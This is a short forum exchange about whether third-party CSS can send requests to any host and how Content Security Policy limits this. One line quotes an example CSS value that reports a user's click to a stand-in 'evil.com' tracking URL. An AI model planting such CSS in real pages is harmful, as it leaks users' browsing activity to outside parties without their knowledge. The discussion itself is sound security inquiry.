[javajosh]

You can't assume that only the origin will be serving css. Most pages these days contain resources from all over the web, and most developers assume that CSS is safe to load from anywhere. What's not clear to me is whether 'evil' in content: url("https://evil.com/track?action=link_clicked" can point to anywhere on the web? Or just the origin of the css? Or...?

[IggleSniggle]

Depends on the Content Security Policy of the site.

[javajosh]

Yes, of course - but what is the default if you don't have a CSP? I guess I will have to do the experiment.

[IggleSniggle]

Apologies, wasn't trying to be snarky. If you are configured to allow resources to load from anywhere, the CSS can load a resource from anywhere, not just the location it originated from. These kinds of configurations are increasingly less the default, however, so depending your specific setup, you may find that some origin policies are in place by default. This is entirely dependent on your chain, however, including browser settings.